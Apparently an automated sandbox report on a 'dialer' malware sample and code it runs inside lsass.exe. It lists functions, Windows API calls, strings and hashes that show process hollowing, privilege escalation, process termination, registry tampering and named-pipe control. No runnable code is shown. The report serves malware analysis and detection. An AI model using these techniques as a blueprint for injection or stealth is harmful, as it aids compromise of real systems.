Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
LocalAlloc.KERNEL32 ref: 0000000140001BFB
InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002B53
HeapAlloc.KERNEL32 ref: 0000000140002B67
GetProcessHeap.KERNEL32 ref: 0000000140002B70
HeapAlloc.KERNEL32 ref: 0000000140002B7E
K32EnumProcesses.KERNEL32 ref: 0000000140002B99
Sleep.KERNEL32 ref: 0000000140002BEE

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812

Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651

OpenProcess.KERNEL32 ref: 0000000140001859
TerminateProcess.KERNELBASE ref: 000000014000186C
CloseHandle.KERNEL32 ref: 0000000140001875
GetProcessHeap.KERNEL32 ref: 0000000140001885

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408

ExitProcess.KERNEL32 ref: 0000000140002263

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
String ID:
API String ID: 3836936051-0
Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

Non-executed Functions

Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00000001400025E7

Part of subcall function 00000001400018AC: OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
Part of subcall function 00000001400018AC: IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
Part of subcall function 00000001400018AC: CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

Part of subcall function 00000001400010C0: OpenProcess.KERNEL32 ref: 000000014000112C
Part of subcall function 00000001400010C0: OpenProcess.KERNEL32 ref: 000000014000114B
Part of subcall function 00000001400010C0: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001170
Part of subcall function 00000001400010C0: PathFindFileNameW.SHLWAPI ref: 000000014000117E
Part of subcall function 00000001400010C0: lstrlenW.KERNEL32 ref: 000000014000118A
Part of subcall function 00000001400010C0: StrCpyW.SHLWAPI ref: 00000001400011A1
Part of subcall function 00000001400010C0: CloseHandle.KERNEL32 ref: 00000001400011AD
Part of subcall function 00000001400010C0: StrCmpIW.SHLWAPI ref: 00000001400011E2
Part of subcall function 00000001400010C0: NtQueryInformationProcess.NTDLL ref: 0000000140001216
Part of subcall function 00000001400010C0: OpenProcessToken.ADVAPI32 ref: 0000000140001240

RegOpenKeyExW.ADVAPI32 ref: 0000000140002683
RegDeleteValueW.ADVAPI32 ref: 000000014000269B
ExitProcess.KERNEL32 ref: 00000001400026BF
GetProcessHeap.KERNEL32 ref: 00000001400026C6
HeapAlloc.KERNEL32 ref: 00000001400026D9
K32EnumProcesses.KERNEL32 ref: 00000001400026F6
ExitProcess.KERNEL32 ref: 0000000140002796

Strings

SOFTWARE, xrefs: 0000000140002675
dialerstager, xrefs: 0000000140002694
open, xrefs: 0000000140002960

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 0000000140001D1D
VirtualAllocEx.KERNEL32 ref: 0000000140001D4C
WriteProcessMemory.KERNEL32 ref: 0000000140001D73
WriteProcessMemory.KERNEL32 ref: 0000000140001DB2
VirtualAlloc.KERNEL32 ref: 0000000140001DE3
GetThreadContext.KERNEL32 ref: 0000000140001DFF
WriteProcessMemory.KERNEL32 ref: 0000000140001E26
SetThreadContext.KERNEL32 ref: 0000000140001E44
ResumeThread.KERNEL32 ref: 0000000140001E52
OpenProcess.KERNEL32 ref: 0000000140001E6A
TerminateProcess.KERNEL32 ref: 0000000140001E7D

Strings

@, xrefs: 0000000140001D44

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00000001400019E6
SysAllocString.OLEAUT32 ref: 00000001400019F6
CoInitializeEx.OLE32 ref: 0000000140001A03
CoInitializeSecurity.OLE32 ref: 0000000140001A3A
CoCreateInstance.OLE32 ref: 0000000140001A7A
VariantInit.OLEAUT32 ref: 0000000140001A8C
CoUninitialize.OLE32 ref: 0000000140001B26
SysFreeString.OLEAUT32 ref: 0000000140001B2F
SysFreeString.OLEAUT32 ref: 0000000140001B38

Strings

dialersvc64, xrefs: 00000001400019DD

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300

Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140001034
RegDeleteKeyW.ADVAPI32 ref: 0000000140001045
RegEnumKeyExW.ADVAPI32 ref: 0000000140001082
RegCloseKey.ADVAPI32 ref: 0000000140001093
RegDeleteKeyExW.ADVAPI32 ref: 00000001400010B0

Strings

SOFTWARE\dialerconfig, xrefs: 0000000140001026, 000000014000109C

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54

Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000140002ACB
WriteFile.KERNEL32 ref: 0000000140002AF3
WriteFile.KERNEL32 ref: 0000000140002B16
CloseHandle.KERNEL32 ref: 0000000140002B1F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 0000000140002AA8

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40

Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002138), ref: 0000000140001924
GetProcAddress.KERNEL32(?,?,00000000,0000000140002138), ref: 0000000140001937

Strings

ntdll.dll, xrefs: 000000014000191A

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

Analysis Process: lsass.exePID: 640, Parent PID: 7464COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	131
Total number of Limit Nodes:	10

Executed Functions

Function 00000140AE86253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000140AE862620
StrCpyW.SHLWAPI ref: 00000140AE862639

Strings

\\.\pipe\, xrefs: 00000140AE86262B

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

Function 00000140AE86202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000140AE8620C6

Part of subcall function 00000140AE862F04: GetProcessHeap.KERNEL32 ref: 00000140AE862F27
Part of subcall function 00000140AE862F04: HeapAlloc.KERNEL32 ref: 00000140AE862F3A
Part of subcall function 00000140AE862F04: StrCmpNIW.SHLWAPI ref: 00000140AE862FAF
Part of subcall function 00000140AE862F04: GetProcessHeap.KERNEL32 ref: 00000140AE863015
Part of subcall function 00000140AE862F04: HeapFree.KERNEL32 ref: 00000140AE863023

Strings

dialer, xrefs: 00000140AE8620BF
S, xrefs: 00000140AE8621E7

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

Function 00000140AE861A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000140AE861A60
StrCmpNIW.SHLWAPI ref: 00000140AE861A7A
lstrlenW.KERNEL32 ref: 00000140AE861A89
StrCpyW.SHLWAPI ref: 00000140AE861A9E

Strings

\\?\, xrefs: 00000140AE861A6E

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

Function 00000140AE86328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000140AE8632AE
PathFindFileNameW.SHLWAPI ref: 00000140AE8632BD

Part of subcall function 00000140AE863844: StrCmpNIW.SHLWAPI ref: 00000140AE86385C

Part of subcall function 00000140AE863790: GetModuleHandleW.KERNEL32 ref: 00000140AE86379E
Part of subcall function 00000140AE863790: GetCurrentProcess.KERNEL32 ref: 00000140AE8637CC
Part of subcall function 00000140AE863790: VirtualProtectEx.KERNEL32 ref: 00000140AE8637EE
Part of subcall function 00000140AE863790: GetCurrentProcess.KERNEL32 ref: 00000140AE863809
Part of subcall function 00000140AE863790: VirtualProtectEx.KERNEL32 ref: 00000140AE86382A

CreateThread.KERNEL32 ref: 00000140AE86330B

Part of subcall function 00000140AE861D14: GetCurrentThread.KERNEL32 ref: 00000140AE861D1F

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

Function 00000140AE861ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA

Sleep.KERNEL32 ref: 00000140AE861AD7
SleepEx.KERNELBASE ref: 00000140AE861ADD

Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
